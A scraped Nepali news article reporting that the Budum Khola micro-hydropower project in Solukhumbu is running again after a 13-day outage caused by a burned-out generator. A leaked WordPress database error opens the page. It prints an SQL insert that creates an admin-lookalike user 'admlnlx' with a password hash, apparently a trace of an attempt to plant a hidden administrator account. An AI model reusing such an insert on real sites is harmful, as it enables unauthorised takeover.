WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAQzAtHCkuM6uaEv5hkJJqUH4AeYOz1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 22:15:52', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । लघुजलविद्युत आयोजना बुदुम खोला १३ दिनपछि पुनः सञ्चालनमा आएको छ । सोलुखुम्बुको महाकुलुङ गाउँपालिका–४, ५ र सोताङ गाउँपालिका–४ नाम्लुङका करिब ११ सय घरधुरी उपभोक्ता रहेको विद्युत सेवा शनिबारदेखि पुनः सञ्चालमा आएको छ ।
डाइनामा जलेर मंसिर ११ गते देखि अवरुद्ध भएको विद्युत मर्मतका लागि काठमान्डौबाट चार जना प्राविधिक टोलि गुदेल ल्याएको थियो । प्राविधिक टोलिले विद्युत मर्मत गरेसंगै सञ्चालमा आएपछि उपभोक्ता हर्षित भएको छ ।
विद्युत सेवा सुचारु भएसंगै महाकुलुङ–५ मा कोठीछोमा रहेको नेपाल टेलिकमको रिपिटर टावर समेत सञ्चालनमा आएको छ । टावरमा विद्युत व्याकपको राम्रो व्यवस्थापन नहुँदा बुदुम खोला अवरुद्ध हुँदा टेलिफोन प्रयोग कर्ता मारमा पर्ने गरेका छन् । विद्युत सेवा सञ्चालमा आएसंगै विद्यार्थी, गृहणी र अन्य साना उद्योग सञ्चालकलाई सहज भएको छ ।